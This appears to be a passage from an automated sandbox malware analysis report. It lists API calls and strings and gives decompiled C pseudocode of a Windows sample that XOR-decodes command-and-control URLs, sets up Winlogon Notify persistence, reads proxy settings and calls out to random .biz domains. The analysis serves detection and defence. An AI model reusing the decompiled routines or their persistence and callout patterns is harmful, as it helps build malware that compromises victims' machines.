0x00401bc5
0x00401bc7
0x00401bc7
0x00401bd6
0x00401bdb
0x00401be1
0x00401be8
0x00000000
0x00401be8
0x00401b75
0x00401af8
0x00401af8
0x00401af9
0x00000000
0x00401af9

APIs

lstrcpy.KERNEL32(?), ref: 00401A14
lstrlen.KERNEL32(00000000,?), ref: 00401A1A
htons.WS2_32(00000050), ref: 00401A7B
inet_addr.WS2_32(?), ref: 00401A96
gethostbyname.WS2_32(?), ref: 00401AA5
socket.WS2_32(00000002,00000001,00000006), ref: 00401AD6
closesocket.WS2_32(00000000), ref: 00401AF9
wsprintfA.USER32 ref: 00401B44
send.WS2_32(00000000,?,00000000,00000000), ref: 00401B5A
lstrcmpi.KERNEL32 ref: 00401B8B
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00401C0F
InternetSetOptionA.WININET(00000000,00000002,00000004), ref: 00401C35
InternetSetOptionA.WININET(00000000,00000006,00000004,00000004), ref: 00401C41
InternetSetOptionA.WININET(00000000,00000005,00000004,00000004), ref: 00401C4D
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84280300,00000000), ref: 00401C65
InternetCloseHandle.WININET(00000000), ref: 00401CA0

Strings

GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00401B36
HTTP/1.0 200, xrefs: 00401B77
GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00401B3D, 00401B42
Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00401C0A
P, xrefs: 00401B23
0, xrefs: 00401B7D

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: Internet$Option$Open$CloseHandleclosesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
String ID: 0$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$Mozilla/4.0 (compatible; MSIE 6.0; Win32)$P
API String ID: 326340279-3185374940
Opcode ID: c5d45dd5b0852868a88cd7f42ace2a0081f095ac5beb68cc9b967b7c8b616f4c
Instruction ID: f87274f76e66a91bb03daa9740d34f21cd30a4f309872cf7f6b7342f01a6976e
Opcode Fuzzy Hash: c5d45dd5b0852868a88cd7f42ace2a0081f095ac5beb68cc9b967b7c8b616f4c
Instruction Fuzzy Hash: 1871C6B0A402159EE7209B65CC45B9B76A8EF05354F1480BAF704FB2E2D7BC99448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401832 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 127
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401832(void* _a8, signed char _a4096, char _a4108) {
				char _v0;
				void* _v4;
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				long _t28;
				long _t30;
				char* _t33;
				signed int _t39;
				char* _t51;
				int _t52;
				char* _t54;
				char* _t55;
				signed int _t56;

				_t28 = 0x201c;
				E00405C00();
				if( *0x412010 != 0) {
					_t56 = 1;
					_t28 = RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", 0, 0, 0, 0xf003f, 0,  &_a8, 0);
					_v16 = 0;
					if(0x201c == 0) {
						while(_t56 != 0) {
							_t51 =  &_a4108;
							_t30 = RegEnumKeyA(0x80000003, _v16, _t51, 0x1000);
							if(_t30 == 0) {
								_push(_t51);
								L00405E40();
								if(_t30 > 0x10 && E00401311(_t51, "_Classes") == 0) {
									_t33 =  &_v0;
									_push(_t33);
									_push(0x20019);
									L00405E30();
									if(RegOpenKeyExA(0x80000003, _t33, _t51, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0) == 0) {
										_v12 = 0x1000;
										if(RegQueryValueExA(_v8, "ProxyEnable", 0,  &_v16, _t51,  &_v12) == 0) {
											_t39 = _a4096 & 0x000000ff;
											if(_t39 != 0 && _t39 != 0x30) {
												_t52 = 0;
												if(RegOpenKeyExA(_v8, "Connections", 0, 0x20019,  &_v20) == 0) {
													while(1) {
														_v12 = 0x1000;
														_v24 = 0x1000;
														_t54 =  &_v0;
														_t55 =  &_a4096;
														if(RegEnumValueA(_v20, _t52, _t55,  &_v12, 0,  &_v16, _t54,  &_v24) != 0) {
															break;
														}
														_t52 = _t52 + 1;
														RegSetValueExA(_v4, _t55, 0, _v16, _t54, _v24);
													}
													_t56 = _t56 &  ~(0 | _t52 == 0x00000000);
													RegCloseKey(_v20);
												} else {
												}
											}
										}
										RegCloseKey(_v8);
									}
								}
								_v20 = _v20 + 1;
								continue;
							}
							break;
						}
						_t28 = RegCloseKey(_a8);
					} else {
					}
				}
				return _t28;
			}

0x00401833
0x0040183b
0x00401847
0x0040184f
0x00401870
0x00401875
0x0040187e
0x004019ad
0x004019b6
0x004019c7
0x004019ce
0x00401889
0x0040188a
0x00401892
0x004018ac
0x004018b0
0x004018b1
0x004018be
0x004018d0
0x004018d6
0x004018fb
0x00401901
0x0040190b
0x0040191d
0x00401937
0x00401951
0x00401951
0x0040195d
0x00401966
0x00401977
0x0040198b
0x00000000
0x00000000
0x0040193f
0x0040194c
0x0040194c
0x0040199a
0x0040199c
0x00000000
0x00401939
0x00401937
0x0040190b
0x004019a5
0x004019a5
0x004018d0
0x004019aa
0x00000000
0x004019aa
0x00000000
0x004019ce
0x004019d8
0x00000000
0x00401884
0x0040187e
0x004019e7

APIs

RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,?,?,00401C02), ref: 00401870
RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004019C7
RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,?,?,00401C02), ref: 004019D8

Strings

\Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004018B8
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 00401866
ProxyEnable, xrefs: 004018EB
_Classes, xrefs: 00401898
Connections, xrefs: 00401927

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: CloseCreateEnum
String ID: Connections$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes
API String ID: 2702359829-1466506419
Opcode ID: 862f5f0fbee953c32f996a64879b4189e60e294f7e4ca364f12703019df267d7
Instruction ID: 8d3d3186799d04fc24a63bfaa52dde977d0271b4b09f6de0e5c37a32578555ba
Opcode Fuzzy Hash: 862f5f0fbee953c32f996a64879b4189e60e294f7e4ca364f12703019df267d7
Instruction Fuzzy Hash: 5741A3B11483057AF720AA618C51FAB76DCEF84748F40083FB685B51E1D7BCD958C6AB

Uniqueness

Uniqueness Score: -1.00%

Function 00402427 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 136
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00402427(void* __eflags) {
				char _v40;
				char _v48;
				void* _v116;
				void* _v118;
				short _v120;
				char _v132;
				void* _v136;
				char _v164;
				void* _t26;
				void* _t34;
				char* _t35;
				signed int _t42;
				intOrPtr _t47;
				void* _t48;
				char* _t49;
				void* _t50;
				void* _t51;
				char* _t52;
				intOrPtr _t59;
				void* _t60;
				char* _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t71;

				_t65 =  &_v40;
				_t59 = E004010B2() % 0xa + 5;
				_t71 = _t59;
				 *_t68 = _t59;
				while(_t71 != 0) {
					_t42 = E004010B2();
					_t52 = _t65;
					_t65 = _t65 + 1;
					 *_t52 = _t42 % 0x1a + 0x61;
					_t47 =  *_t68 - 1;
					 *_t68 = _t47;
					_t71 = _t47;
				}
				 *_t65 = 0x2e;
				_t26 = E004010B2() & 0x00000007;
				_push( *((intOrPtr*)(0x410cc0 + _t26 * 4)));
				_push(_t65 + 1);
				L00405E20();
				if( *0x412030 > 4) {
					L9:
					if( *0x4121d0 == 0) {
						L17:
						return _t26 | 0xffffffff;
					}
					E00401832();
					_t26 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Win32)", 4, 0, 0, 0);
					_t67 = _t26;
					if(_t26 == 0) {
						goto L17;
					}
					_v136 = 0x9c40;
					_t48 =  &_v136;
					InternetSetOptionA(_t26, 2, _t48, 4);
					InternetSetOptionA(_t67, 6, _t48, 4);
					InternetSetOptionA(_t67, 5, _t48, 4);
					_t49 =  &_v164;
					wsprintfA(_t49, "http://%s/",  &_v116);
					_t34 = InternetOpenUrlA(_t67, _t49, 0, 0, 0x84280300, 0);
					_t60 = _t34;
					if(_t34 == 0) {
						_t26 = InternetCloseHandle(_t67);
						goto L17;
					}
					_t35 =  *0x412030; // 0x0
					if(_t35 <= 4) {
						 *0x412030 =  &(_t35[1]);
					}
					InternetCloseHandle(_t60);
					InternetCloseHandle(_t67);
					L15:
					return 0;
				}
				_t26 =  &_v48;
				_push(_t26);
				L004061A0();
				_t50 = _t26;
				if(_t26 == 0) {
					goto L9;
				}
				_t26 =  *(_t26 + 0xc);
				if( *_t26 == 0) {
					goto L9;
				}
				_push(0x50);
				L00406180();
				_v118 = _t26;
				_t26 =  *( *( *(_t50 + 0xc)));
				_v116 = _t26;
				_push(6);
				_push(1);
				_v120 = 2;
				_push(2);
				L004061B0();
				_t51 = _t26;
				if(_t26 == 0xffffffff) {
					goto L9;
				}
				_push(0x28);
				_t26 = E0040172D(_t26,  &_v132);
				_v136 = _t26;
				_push(_t51);
				L004061C0();
				if( *_t68 != 0) {
					goto L9;
				}
				 *0x412030 = 0;
				goto L15;
			}

0x0040242c
0x00402440
0x00402443
0x00402445
0x00402448
0x0040244a
0x00402454
0x0040245a
0x00402461
0x00402466
0x00402467
0x0040246a
0x0040246a
0x0040246e
0x00402477
0x0040247a
0x00402481
0x00402482
0x0040248e
0x00402503
0x0040250a
0x004025ba
0x00000000
0x004025ba
0x00402510
0x00402522
0x0040252a
0x0040252c
0x00000000
0x00000000
0x00402532
0x0040253b
0x00402543
0x0040254f
0x0040255b
0x0040256b
0x00402570
0x00402582
0x0040258d
0x0040258f
0x004025b4
0x00000000
0x004025b4
0x00402591
0x00402599
0x0040259c
0x0040259c
0x004025a2
0x004025a9
0x004025af
0x00000000
0x004025af
0x00402490
0x00402494
0x00402495
0x0040249c
0x0040249e
0x00000000
0x00000000
0x004024a0
0x004024a6
0x00000000
0x00000000
0x004024a8
0x004024aa
0x004024af
0x004024b9
0x004024bb
0x004024bf
0x004024c1
0x004024c3
0x004024ca
0x004024cc
0x004024d4
0x004024d6
0x00000000
0x00000000
0x004024dc
0x004024de
0x004024e3
0x004024e7
0x004024e8
0x004024f2
0x00000000
0x00000000
0x004024f4
0x00000000

APIs

Part of subcall function 004010B2: wsprintfA.USER32 ref: 004010C5

lstrcpy.KERNEL32(?,00402796), ref: 00402482
gethostbyname.WS2_32(?), ref: 00402495
htons.WS2_32(00000050), ref: 004024AA
socket.WS2_32(00000002,00000001,00000006), ref: 004024CC
closesocket.WS2_32(00000000), ref: 004024E8

Part of subcall function 00401832: RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,?,?,00401C02), ref: 00401870

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00402522
InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 00402543
InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 0040254F
InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 0040255B
wsprintfA.USER32 ref: 00402570
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84280300,00000000), ref: 00402582
InternetCloseHandle.WININET(00000000), ref: 004025A2
InternetCloseHandle.WININET(00000000), ref: 004025A9
InternetCloseHandle.WININET(00000000), ref: 004025B4

Strings

http://%s/, xrefs: 00402566
Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 0040251D

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOption$Openwsprintf$Createclosesocketgethostbynamehtonslstrcpysocket
String ID: Mozilla/4.0 (compatible; MSIE 6.0; Win32)$http://%s/
API String ID: 2574392083-3144419281
Opcode ID: 56421fda0256175cb276b36f0f9640f1fb6e28286914dfc1848891d9f7e62b0a
Instruction ID: 67c2733fa8eb29aad750db9e29587364db6da652461455575ed9c5e3ed18a433
Opcode Fuzzy Hash: 56421fda0256175cb276b36f0f9640f1fb6e28286914dfc1848891d9f7e62b0a
Instruction Fuzzy Hash: 3941BD70644300BEE710AB24CE8AB5B36A5AF44744F04853AF641EA2D1D7FC9951CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040395A Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040395A() {
				signed char* _t436;
				signed char* _t437;
				signed char* _t438;
				signed char* _t439;
				signed char* _t440;
				signed char* _t446;
				signed char _t447;
				signed char _t448;
				signed char _t449;
				signed char _t450;
				signed char _t451;
				signed char _t452;
				signed char _t453;
				signed char _t454;
				signed char _t455;
				signed char _t456;
				signed char _t457;
				signed char _t458;
				signed char _t459;
				signed char _t460;
				signed char _t461;
				signed char _t462;
				signed char _t463;
				signed char _t464;
				signed char _t465;
				signed char _t466;
				signed char _t467;
				signed char _t468;
				signed char _t469;
				signed char _t470;
				signed char _t471;
				signed char _t472;
				signed char _t473;
				signed char _t474;
				signed char _t475;
				signed char _t476;
				signed char _t477;
				signed char _t478;
				signed char _t479;
				signed char _t480;
				signed char _t481;
				signed char _t482;
				signed char _t483;
				signed char _t484;
				signed char _t485;
				signed char _t486;
				signed char _t487;
				signed char _t488;
				signed char _t489;
				signed char _t490;
				signed char _t491;
				signed char _t492;
				signed char _t493;
				signed char _t494;
				signed char _t495;
				signed char _t496;
				signed char _t497;
				signed char _t498;
				signed char _t499;
				signed char _t500;
				signed char _t501;
				void* _t506;
				signed char* _t507;
				signed char _t508;
				int _t509;
				intOrPtr _t519;
				signed int _t521;
				signed char _t524;
				signed char _t525;
				signed char _t526;
				void* _t528;
				long _t529;
				void* _t530;
				void* _t532;
				char* _t537;
				void* _t540;
				signed char* _t559;
				void* _t562;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t570;
				void* _t571;
				void* _t572;
				CHAR* _t575;
				void* _t577;
				long _t578;
				CHAR* _t579;
				void* _t581;
				long _t582;
				CHAR* _t587;
				void* _t589;
				CHAR* _t590;
				void* _t592;
				char* _t602;
				void* _t603;
				signed char* _t608;
				void* _t611;
				void* _t612;
				void* _t618;
				void* _t619;
				void* _t624;
				void* _t629;
				void* _t631;
				void* _t633;
				void* _t637;
				void* _t639;
				void* _t644;
				long _t648;
				int _t649;
				void* _t655;
				void* _t657;
				void* _t660;
				void* _t667;
				void* _t669;
				void* _t671;
				void* _t676;
				void* _t679;
				void* _t681;
				void* _t684;
				void* _t686;
				void* _t690;
				void* _t695;
				void* _t697;
				void* _t699;
				int _t703;
				void* _t704;
				void* _t706;
				char* _t707;
				char* _t708;
				void* _t709;
				char* _t710;
				char* _t711;
				char* _t712;
				char* _t713;
				char* _t714;
				void* _t715;
				char* _t716;
				void* _t717;
				char* _t719;
				CHAR* _t720;
				void* _t724;
				void* _t726;
				int _t729;
				void* _t743;
				int _t744;
				void* _t747;
				CHAR* _t753;
				void* _t755;
				long _t756;
				void* _t761;
				void* _t769;
				void* _t770;
				signed char _t778;
				void* _t784;
				void* _t788;
				void* _t790;
				int _t791;
				void* _t794;
				signed char _t805;
				int _t806;
				signed char* _t807;
				void* _t808;
				void* _t810;
				void* _t815;
				void* _t817;
				void* _t818;
				long* _t819;
				signed int* _t822;
				long _t832;
				int _t833;
				signed char _t843;
				void* _t846;
				void* _t848;
				int _t849;
				CHAR* _t850;
				void* _t851;
				void* _t853;
				void* _t856;
				void* _t858;
				void* _t859;
				void* _t860;
				signed int* _t863;
				void* _t872;
				int _t873;
				signed char _t883;
				int _t891;
				CHAR* _t893;
				void* _t899;
				void* _t906;
				CHAR* _t911;
				void* _t912;
				void* _t914;
				void* _t916;
				void* _t923;
				void* _t925;
				void* _t927;
				void* _t930;
				signed int _t933;
				void* _t937;
				long _t938;
				int _t940;
				void* _t950;
				void* _t951;
				struct HINSTANCE__* _t1019;
				CHAR* _t1020;
				CHAR* _t1021;
				char* _t1022;
				CHAR* _t1023;
				CHAR* _t1024;
				CHAR* _t1025;
				CHAR* _t1026;
				CHAR* _t1027;
				CHAR* _t1028;
				CHAR* _t1029;
				long* _t1030;
				void** _t1031;
				char* _t1032;
				char* _t1033;
				CHAR* _t1034;
				void* _t1037;
				char* _t1038;
				char* _t1040;
				char* _t1041;
				char* _t1042;
				long* _t1043;
				CHAR* _t1044;
				int _t1045;
				CHAR* _t1046;
				CHAR* _t1047;
				void* _t1048;
				signed int* _t1050;
				char* _t1051;
				void* _t1052;
				CHAR* _t1053;
				CHAR* _t1054;
				void* _t1055;
				signed int* _t1057;
				char* _t1058;
				CHAR* _t1059;
				struct _STARTUPINFOA* _t1060;
				void* _t1061;
				void* _t1062;
				long _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				CHAR* _t1067;
				signed char _t1068;
				long* _t1072;
				long* _t1073;
				void* _t1074;
				signed char _t1076;
				signed char _t1081;
				long _t1082;
				long _t1083;
				void* _t1084;
				signed int* _t1108;
				signed char* _t1109;
				signed char* _t1110;
				signed int* _t1112;
				signed int* _t1115;
				void* _t1120;
				void* _t1121;
				char* _t1122;
				signed char* _t1123;
				void* _t1124;
				void* _t1125;
				long _t1126;
				signed int _t1127;
				signed int* _t1128;
				void** _t1129;
				void* _t1131;
				void** _t1132;
				void** _t1133;
				char* _t1134;
				CHAR* _t1135;
				signed char* _t1136;
				long* _t1137;
				signed int* _t1138;
				void* _t1139;
				void* _t1140;
				char* _t1141;
				signed int* _t1142;
				void* _t1143;
				char* _t1144;
				signed int* _t1145;
				CHAR* _t1147;
				void* _t1148;
				void* _t1149;
				signed int* _t1150;
				void* _t1151;
				long _t1152;
				struct _FILETIME* _t1153;
				void* _t1154;
				void* _t1155;
				long* _t1156;

				_t436 = "InternetOpenA";
				while(_t436 < 0x4105fd) {
					 *_t436 =  *_t436 ^ 0x000000d4;
					_t436 =  &(_t436[1]);
				}
				_t437 = "InternetOpenUrlA";
				while(1) {
					__eflags = _t437 - 0x4105ef;
					if(_t437 >= 0x4105ef) {
						break;
					}
					 *_t437 =  *_t437 ^ 0x000000d4;
					_t437 =  &(_t437[1]);
				}
				_t438 = "InternetReadFile";
				while(1) {
					__eflags = _t438 - 0x4105de;
					if(_t438 >= 0x4105de) {
						break;
					}
					 *_t438 =  *_t438 ^ 0x000000d4;
					_t438 =  &(_t438[1]);
				}
				_t439 = "InternetSetOptionA";
				while(1) {
					__eflags = _t439 - 0x4105cd;
					if(_t439 >= 0x4105cd) {
						break;
					}
					 *_t439 =  *_t439 ^ 0x000000d4;
					_t439 =  &(_t439[1]);
				}
				_t440 = "InternetCloseHandle";
				while(1) {
					__eflags = _t440 - 0x4105ba;
					if(_t440 >= 0x4105ba) {
						break;
					}
					 *_t440 =  *_t440 ^ 0x000000d4;
					_t440 =  &(_t440[1]);
				}
				 *0x4121d0 = GetProcAddress(_t1019, "InternetOpenA");
				 *0x4121e0 = GetProcAddress(_t1019, "InternetOpenUrlA");
				 *0x4121f0 = GetProcAddress(_t1019, "InternetReadFile");
				 *0x412200 = GetProcAddress(_t1019, "InternetSetOptionA");
				 *0x412210 = GetProcAddress(_t1019, "InternetCloseHandle");
				_t446 = "winrnt.exe";
				while(1) {
					__eflags = _t446 - 0x4105a6;
					if(_t446 >= 0x4105a6) {
						break;
					}
					 *_t446 =  *_t446 ^ 0x000000d4;
					_t446 =  &(_t446[1]);
				}
				_t447 = "rmass.exe";
				while(1) {
					__eflags = _t447 - 0x41059b;
					if(_t447 >= 0x41059b) {
						break;
					}
					 *_t447 =  *_t447 ^ 0x000000d4;
					__eflags =  *_t447;
					_t447 = (_t447 ^ _t1076) + 1;
				}
				_t448 = "RECOVER32.DLL";
				while(1) {
					__eflags = _t448 - 0x410591;
					if(_t448 >= 0x410591) {
						break;
					}
					 *_t448 =  *_t448 ^ 0x000000d4;
					__eflags =  *_t448;
					_t448 = (_t448 ^ _t1076) + 1;
				}
				_t449 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}";
				while(1) {
					__eflags = _t449 - 0x410583;
					if(_t449 >= 0x410583) {
						break;
					}
					 *_t449 =  *_t449 ^ 0x000000d4;
					__eflags =  *_t449;
					_t449 = (_t449 ^ _t1076) + 1;
				}
				_t450 = "gymspzd.dll";
				while(1) {
					__eflags = _t450 - 0x41051a;
					if(_t450 >= 0x41051a) {
						break;
					}
					 *_t450 =  *_t450 ^ 0x000000d4;
					__eflags =  *_t450;
					_t450 = (_t450 ^ _t1076) + 1;
				}
				_t451 = "aset32.exe";
				while(1) {
					__eflags = _t451 - 0x41050e;
					if(_t451 >= 0x41050e) {
						break;
					}
					 *_t451 =  *_t451 ^ 0x000000d4;
					__eflags =  *_t451;
					_t451 = (_t451 ^ _t1076) + 1;
				}
				_t452 = "ahuy.exe";
				while(1) {
					__eflags = _t452 - 0x410503;
					if(_t452 >= 0x410503) {
						break;
					}
					 *_t452 =  *_t452 ^ 0x000000d4;
					__eflags =  *_t452;
					_t452 = (_t452 ^ _t1076) + 1;
				}
				_t453 = "idbg32.exe";
				while(1) {
					__eflags = _t453 - 0x4104fa;
					if(_t453 >= 0x4104fa) {
						break;
					}
					 *_t453 =  *_t453 ^ 0x000000d4;
					__eflags =  *_t453;
					_t453 = (_t453 ^ _t1076) + 1;
				}
				_t454 = "ntdbg.exe";
				while(1) {
					__eflags = _t454 - 0x4104ef;
					if(_t454 >= 0x4104ef) {
						break;
					}
					 *_t454 =  *_t454 ^ 0x000000d4;
					__eflags =  *_t454;
					_t454 = (_t454 ^ _t1076) + 1;
				}
				_t455 = "http://%s.biz/d/N?";
				while(1) {
					__eflags = _t455 - 0x4104e5;
					if(_t455 >= 0x4104e5) {
						break;
					}
					 *_t455 =  *_t455 ^ 0x000000d4;
					__eflags =  *_t455;
					_t455 = (_t455 ^ _t1076) + 1;
				}
				_t456 = "http://%s.biz/d/G?";
				while(1) {
					__eflags = _t456 - 0x4104d2;
					if(_t456 >= 0x4104d2) {
						break;
					}
					 *_t456 =  *_t456 ^ 0x000000d4;
					__eflags =  *_t456;
					_t456 = (_t456 ^ _t1076) + 1;
				}
				_t457 = "http://utbidet-ugeas.biz/d/rpt?";
				while(1) {
					__eflags = _t457 - 0x4104bf;
					if(_t457 >= 0x4104bf) {
						break;
					}
					 *_t457 =  *_t457 ^ 0x000000d4;
					__eflags =  *_t457;
					_t457 = (_t457 ^ _t1076) + 1;
				}
				_t458 = "modem";
				while(1) {
					__eflags = _t458 - 0x41049d;
					if(_t458 >= 0x41049d) {
						break;
					}
					 *_t458 =  *_t458 ^ 0x000000d4;
					__eflags =  *_t458;
					_t458 = (_t458 ^ _t1076) + 1;
				}
				_t459 = "isdn";
				while(1) {
					__eflags = _t459 - 0x410497;
					if(_t459 >= 0x410497) {
						break;
					}
					 *_t459 =  *_t459 ^ 0x000000d4;
					__eflags =  *_t459;
					_t459 = (_t459 ^ _t1076) + 1;
				}
				_t460 = "%u.%u.%u.%s";
				while(1) {
					__eflags = _t460 - 0x410492;
					if(_t460 >= 0x410492) {
						break;
					}
					 *_t460 =  *_t460 ^ 0x000000d4;
					__eflags =  *_t460;
					_t460 = (_t460 ^ _t1076) + 1;
				}
				_t461 = "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}";
				while(1) {
					__eflags = _t461 - 0x410486;
					if(_t461 >= 0x410486) {
						break;
					}
					 *_t461 =  *_t461 ^ 0x000000d4;
					__eflags =  *_t461;
					_t461 = (_t461 ^ _t1076) + 1;
				}
				_t462 = "%ComSpec%";
				while(1) {
					__eflags = _t462 - 0x410425;
					if(_t462 >= 0x410425) {
						break;
					}
					 *_t462 =  *_t462 ^ 0x000000d4;
					__eflags =  *_t462;
					_t462 = (_t462 ^ _t1076) + 1;
				}
				_t463 = "%CommonProgramFiles%\\System\\";
				while(1) {
					__eflags = _t463 - 0x41041b;
					if(_t463 >= 0x41041b) {
						break;
					}
					 *_t463 =  *_t463 ^ 0x000000d4;
					__eflags =  *_t463;
					_t463 = (_t463 ^ _t1076) + 1;
				}
				_t464 = "%AppData%\\";
				while(1) {
					__eflags = _t464 - 0x4103fe;
					if(_t464 >= 0x4103fe) {
						break;
					}
					 *_t464 =  *_t464 ^ 0x000000d4;
					__eflags =  *_t464;
					_t464 = (_t464 ^ _t1076) + 1;
				}
				_t465 = "Debugger";
				while(1) {
					__eflags = _t465 - 0x4103f3;
					if(_t465 >= 0x4103f3) {
						break;
					}
					 *_t465 =  *_t465 ^ 0x000000d4;
					__eflags =  *_t465;
					_t465 = (_t465 ^ _t1076) + 1;
				}
				_t466 = "IsInstalled";
				while(1) {
					__eflags = _t466 - 0x4103ea;
					if(_t466 >= 0x4103ea) {
						break;
					}
					 *_t466 =  *_t466 ^ 0x000000d4;
					__eflags =  *_t466;
					_t466 = (_t466 ^ _t1076) + 1;
				}
				_t467 = "StubPath";
				while(1) {
					__eflags = _t467 - 0x4103de;
					if(_t467 >= 0x4103de) {
						break;
					}
					 *_t467 =  *_t467 ^ 0x000000d4;
					__eflags =  *_t467;
					_t467 = (_t467 ^ _t1076) + 1;
				}
				_t468 = "museum";
				while(1) {
					__eflags = _t468 - 0x4103d5;
					if(_t468 >= 0x4103d5) {
						break;
					}
					 *_t468 =  *_t468 ^ 0x000000d4;
					__eflags =  *_t468;
					_t468 = (_t468 ^ _t1076) + 1;
				}
				_t469 = "GET /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
				while(1) {
					__eflags = _t469 - 0x4103ce;
					if(_t469 >= 0x4103ce) {
						break;
					}
					 *_t469 =  *_t469 ^ 0x000000d4;
					__eflags =  *_t469;
					_t469 = (_t469 ^ _t1076) + 1;
				}
				_t470 = "GET /%s HTTP/1.0\r\nHost: %s:%u\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
				while(1) {
					__eflags = _t470 - 0x410371;
					if(_t470 >= 0x410371) {
						break;
					}
					 *_t470 =  *_t470 ^ 0x000000d4;
